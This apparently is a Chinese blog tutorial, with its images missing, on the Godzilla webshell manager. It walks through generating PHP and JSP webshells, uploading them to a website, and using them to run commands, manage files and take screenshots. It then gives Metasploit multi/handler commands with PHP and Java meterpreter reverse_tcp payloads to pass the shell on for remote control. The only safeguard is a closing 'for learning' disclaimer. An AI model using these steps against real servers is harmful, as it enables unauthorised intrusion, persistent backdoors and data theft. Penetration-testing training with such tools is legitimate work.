您当前的位置: 首页 > 

星球守护者

暂无认证

  • 2浏览

    0关注

    641博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

使用教程学习

星球守护者 发布时间:2021-07-30 22:16:28 ,浏览量:2

文章目录
    • 上传php木马进行管理(godzila)
    • 上传jsp木马进行管理(godzila)
      • 免责声明

上传php木马进行管理(godzila)

在这里插入图片描述

第一步 点击管理–>生成–>payload

在这里插入图片描述

第二步 生成shell

密码:可以自行定义
密码:可以自行定义
有效载荷:
* JavaDynamicPayload
* CShapDynamicPayload
* PhpDynamicPayload
加密器:
* JAVA_AES_BASE64
* JAVA_AES_RAW

在这里插入图片描述

在这里插入图片描述 在这里插入图片描述

第三步 马上传到服务器

在这里插入图片描述 在这里插入图片描述

第三步 哥斯拉连接

在这里插入图片描述 在这里插入图片描述 在这里插入图片描述 在这里插入图片描述

第四步 使用功能-基础信息

在这里插入图片描述

第五步 使用功能-命令执行

在这里插入图片描述

第六步 使用功能-文件管理

在这里插入图片描述

第五七步 于msf联动

在kaili中生成payload,在特斯拉进行监听回弹

kali中
msfconsole
use exploit/multi/handler
set payload /php/meterpreter/reverse_tcp
set lhost 
set lport 
run -j -z 
pmeterpreter-host-172.161.11.2 port-4444

在这里插入图片描述 在这里插入图片描述

哥斯拉

load
go 

在这里插入图片描述

kali中的MSF管理shell

job 查看后台任务
job -k id
seesions 查看存在的会话
sessions -i id 进入指定id的会话

在这里插入图片描述 在这里插入图片描述

上传jsp木马进行管理(godzila)

第一步 godzila生成jsp木马

在这里插入图片描述 在这里插入图片描述 在这里插入图片描述 在这里插入图片描述

第二步 网站上传jsp木马

在这里插入图片描述

在这里插入图片描述

第三步 godzila进行连接

在这里插入图片描述

在这里插入图片描述 在这里插入图片描述

第四步 命令执行

在这里插入图片描述

第五步 文件管理

在这里插入图片描述

第六步 屏幕截屏

在这里插入图片描述 在这里插入图片描述

第七步 与MSF联动

kali中
msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lhost 
set lport 
run -j -z 
Jmeterpreter-host-172.161.11.2 port-4444

在这里插入图片描述 在这里插入图片描述 在这里插入图片描述

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果上传者概不负责!

关注
打赏
1662051426
查看更多评论
立即登录/注册

微信扫码登录

0.0528s